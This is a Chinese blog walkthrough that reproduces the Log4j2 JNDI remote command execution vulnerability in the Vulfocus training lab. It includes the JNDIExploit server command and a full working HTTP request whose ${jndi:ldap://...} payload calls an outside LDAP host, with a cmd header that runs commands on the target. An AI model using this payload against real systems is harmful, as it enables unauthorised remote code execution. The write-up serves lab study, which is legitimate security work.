飙血推荐
  • HTML教程
  • MySQL教程
  • JavaScript基础教程
  • php入门教程
  • JavaScript正则表达式运用
  • Excel函数教程
  • AngularJS教程
  • UEditor使用文档
  • ThinkPHP5.0教程

【Vulfocus解题系列】手把手教你使用Vulfocus公开靶场对Apache Log4j2远程命令执行漏洞复现

时间:2021-12-12  作者:huaflwr  
【Vulfocus解题系列】手把手教你使用Vulfocus公开靶场对Apache Log4j2远程命令执行漏洞复现 使用Vulfocus公开靶场对Apache Log4j2远程命令执行漏洞复现

前言

关于这个漏洞,啥都不用说了,直接发车。

工具下载

JNDIExploit:https://域名/0x727/JNDIExploit

复现过程

  1. 启动靶场环境

    直接用vulfocus启一个环境。
    官网地址:http://域名/

​ 没注册的先注册,进来首页即可看到靶场

image-20211212143803332

  1. 用JNDIExploit启一个ldap的服务。

  2. 命令如下:

    java -jar JNDIExploit-1.3-域名 -l 1234 -p 8988 -i 0.0.0.0

    image-20211212145457761

  3. 接着将payload更改如下:
    payload=${jndi:ldap://1.2.3.4:1234/TomcatBypass/TomcatEcho}

    注意Content-Type的类型为:application/x-www-form-urlencoded
    在请求头中添加cmd字段,后面跟上需要执行的命令即可。

    完整数据包如下:

    POST /hello  HTTP/1.1
    Host: 域名:41624
    Content-Type: application/x-www-form-urlencoded
    cmd: whoami
    Content-Length: 47
    
    payload=${jndi:ldap://1.2.3.4:1234/TomcatBypass/TomcatEcho}
    

    成功回显命令:

    image-20211212145553316

后记

使用公开靶场或自己搭建环境进行漏洞的复现和研究,是完全没问题的,但切忌随意在互联网进行大范围未授权测试,因为总会有人来收拾这一地鸡毛。

标签:编程
湘ICP备14001474号-3  投诉建议:234161800@qq.com   部分内容来源于网络,如有侵权,请联系删除。